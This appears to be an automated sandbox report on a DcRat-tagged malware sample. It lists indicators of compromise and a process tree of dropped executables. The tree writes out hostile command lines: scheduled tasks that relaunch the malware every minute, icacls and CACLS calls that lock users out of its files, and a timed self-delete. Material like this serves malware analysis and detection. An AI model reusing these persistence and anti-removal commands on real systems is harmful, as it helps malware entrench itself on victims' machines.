2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeDebugPrivilege 1784 chum.exe Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeDebugPrivilege 4636 nbveek.exe Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 1080 msedge.exe 2680 Process not Found 2680 Process not Found 2680 Process not Found 1080 msedge.exe 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 3796 rundll32.exe 2028 Otfhfhweptay.exe 4192 chrome.exe 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 3796 rundll32.exe 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2028 Otfhfhweptay.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 5328 nbveek.exe 5328 nbveek.exe 4192 chrome.exe 2680 Process not Found 2680 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2680 wrote to memory of 1752 2680 Process not Found 87 PID 2680 wrote to memory of 1752 2680 Process not Found 87 PID 2680 wrote to memory of 1752 2680 Process not Found 87 PID 2680 wrote to memory of 3332 2680 Process not Found 88 PID 2680 wrote to memory of 3332 2680 Process not Found 88 PID 2680 wrote to memory of 3332 2680 Process not Found 88 PID 2680 wrote to memory of 1552 2680 Process not Found 89 PID 2680 wrote to memory of 1552 2680 Process not Found 89 PID 2680 wrote to memory of 1552 2680 Process not Found 89 PID 3332 wrote to memory of 3480 3332 BF00.exe 90 PID 3332 wrote to memory of 3480 3332 BF00.exe 90 PID 3332 wrote to memory of 3480 3332 BF00.exe 90 PID 1552 wrote to memory of 5036 1552 C059.exe 91 PID 1552 wrote to memory of 5036 1552 C059.exe 91 PID 1552 wrote to memory of 5036 1552 C059.exe 91 PID 2680 wrote to memory of 240 2680 Process not Found 92 PID 2680 wrote to memory of 240 2680 Process not Found 92 PID 2680 wrote to memory of 240 2680 Process not Found 92 PID 3480 wrote to memory of 1532 3480 nbveek.exe 93 PID 3480 wrote to memory of 1532 3480 nbveek.exe 93 PID 3480 wrote to memory of 1532 3480 nbveek.exe 93 PID 3480 wrote to memory of 2312 3480 nbveek.exe 95 PID 3480 wrote to memory of 2312 3480 nbveek.exe 95 PID 3480 wrote to memory of 2312 3480 nbveek.exe 95 PID 2680 wrote to memory of 3816 2680 Process not Found 96 PID 2680 wrote to memory of 3816 2680 Process not Found 96 PID 2680 wrote to memory of 3816 2680 Process not Found 96 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 1752 wrote to memory of 4224 1752 B9CF.exe 98 PID 2312 wrote to memory of 3588 2312 cmd.exe 99 PID 2312 wrote to memory of 3588 2312 cmd.exe 99 PID 2312 wrote to memory of 3588 2312 cmd.exe 99 PID 2680 wrote to memory of 4452 2680 Process not Found 100 PID 2680 wrote to memory of 4452 2680 Process not Found 100 PID 2680 wrote to memory of 4452 2680 Process not Found 100 PID 2312 wrote to memory of 2904 2312 cmd.exe 101 PID 2312 wrote to memory of 2904 2312 cmd.exe 101 PID 2312 wrote to memory of 2904 2312 cmd.exe 101 PID 3480 wrote to memory of 1784 3480 nbveek.exe 102 PID 3480 wrote to memory of 1784 3480 nbveek.exe 102 PID 3480 wrote to memory of 1784 3480 nbveek.exe 102 PID 4224 wrote to memory of 4856 4224 B9CF.exe 105 PID 4224 wrote to memory of 4856 4224 B9CF.exe 105 PID 4224 wrote to memory of 4856 4224 B9CF.exe 105 PID 2680 wrote to memory of 3052 2680 Process not Found 104 PID 2680 wrote to memory of 3052 2680 Process not Found 104 PID 2680 wrote to memory of 3052 2680 Process not Found 104 PID 3480 wrote to memory of 4312 3480 nbveek.exe 106 PID 3480 wrote to memory of 4312 3480 nbveek.exe 106 PID 3480 wrote to memory of 4312 3480 nbveek.exe 106 PID 3480 wrote to memory of 4312 3480 nbveek.exe 106 PID 3480 wrote to memory of 4312 3480 nbveek.exe 106 PID 3480 wrote to memory of 4312 3480 nbveek.exe 106 PID 3480 wrote to memory of 4312 3480 nbveek.exe 106 PID 3480 wrote to memory of 4312 3480 nbveek.exe 106 PID 2680 wrote to memory of 4812 2680 Process not Found 108 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe"C:\Users\Admin\AppData\Local\Temp\cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe"1⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4356
-
C:\Users\Admin\AppData\Local\Temp\B9CF.exeC:\Users\Admin\AppData\Local\Temp\B9CF.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\B9CF.exeC:\Users\Admin\AppData\Local\Temp\B9CF.exe2⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\c8ed5026-ddb5-4746-9a75-220580a8bd81" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:4856
-
-
C:\Users\Admin\AppData\Local\Temp\B9CF.exe"C:\Users\Admin\AppData\Local\Temp\B9CF.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3720 -
C:\Users\Admin\AppData\Local\Temp\B9CF.exe"C:\Users\Admin\AppData\Local\Temp\B9CF.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Checks computer location settings
PID:3432 -
C:\Users\Admin\AppData\Local\c9526fa5-404e-4af2-9f8a-3373b7d1d668\build2.exe"C:\Users\Admin\AppData\Local\c9526fa5-404e-4af2-9f8a-3373b7d1d668\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5512 -
C:\Users\Admin\AppData\Local\c9526fa5-404e-4af2-9f8a-3373b7d1d668\build2.exe"C:\Users\Admin\AppData\Local\c9526fa5-404e-4af2-9f8a-3373b7d1d668\build2.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:5436 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\c9526fa5-404e-4af2-9f8a-3373b7d1d668\build2.exe" & exit7⤵PID:5408
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:5708
-
-
-
-
-
C:\Users\Admin\AppData\Local\c9526fa5-404e-4af2-9f8a-3373b7d1d668\build3.exe"C:\Users\Admin\AppData\Local\c9526fa5-404e-4af2-9f8a-3373b7d1d668\build3.exe"5⤵
- Executes dropped EXE
PID:5864 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"6⤵
- DcRat
- Creates scheduled task(s)
PID:5904
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BF00.exeC:\Users\Admin\AppData\Local\Temp\BF00.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe" /F3⤵
- DcRat
- Creates scheduled task(s)
PID:1532
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\cb465ca805" /P "Admin:N"&&CACLS "..\cb465ca805" /P "Admin:R" /E&&Exit3⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:3588
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"4⤵PID:2904
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E4⤵PID:840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:4436
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\cb465ca805" /P "Admin:N"4⤵PID:1316
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\cb465ca805" /P "Admin:R" /E4⤵PID:4816
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000001051\chum.exe"C:\Users\Admin\AppData\Local\Temp\1000001051\chum.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"3⤵
- Executes dropped EXE
PID:4312 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.04⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1080 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8714846f8,0x7ff871484708,0x7ff8714847185⤵PID:2396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:25⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:35⤵PID:1336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2144 /prefetch:85⤵PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:15⤵PID:4772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:15⤵PID:812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:15⤵
- Suspicious use of SetThreadContext
PID:4452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5192 /prefetch:85⤵PID:664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:15⤵PID:1388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:15⤵PID:4116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5336 /prefetch:85⤵PID:5792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:15⤵PID:5992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:15⤵PID:6028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:85⤵PID:5224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
PID:5696 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf4,0xe0,0xdc,0x214,0xe8,0x7ff68a625460,0x7ff68a625470,0x7ff68a6254806⤵PID:6008
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:85⤵PID:5336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:15⤵PID:1456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:15⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:15⤵PID:3664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:15⤵PID:3496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2268 /prefetch:85⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1128 /prefetch:85⤵PID:5608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3416 /prefetch:85⤵PID:364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,16541138969426156696,11362678362391410024,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:85⤵PID:4364
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.04⤵PID:4848
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ff8714846f8,0x7ff871484708,0x7ff8714847185⤵PID:1736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,7376669031027620191,14028030829677651893,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 /prefetch:25⤵PID:2236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,7376669031027620191,14028030829677651893,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:35⤵PID:4984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000003051\portu1.exe"C:\Users\Admin\AppData\Local\Temp\1000003051\portu1.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4080 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 12364⤵
- Program crash
PID:5588
-
-
-
C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"3⤵PID:4860
-
-
C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 20004⤵
- Program crash
PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005051\linda5.exe"C:\Users\Admin\AppData\Local\Temp\1000005051\linda5.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
PID:5188 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" -y .\KAZ6L.QQp4⤵
- Loads dropped DLL
PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5328
-
-
C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"3⤵
- Executes dropped EXE
PID:5552 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.04⤵PID:4792
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8714846f8,0x7ff871484708,0x7ff8714847185⤵PID:3500
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.04⤵PID:724
-
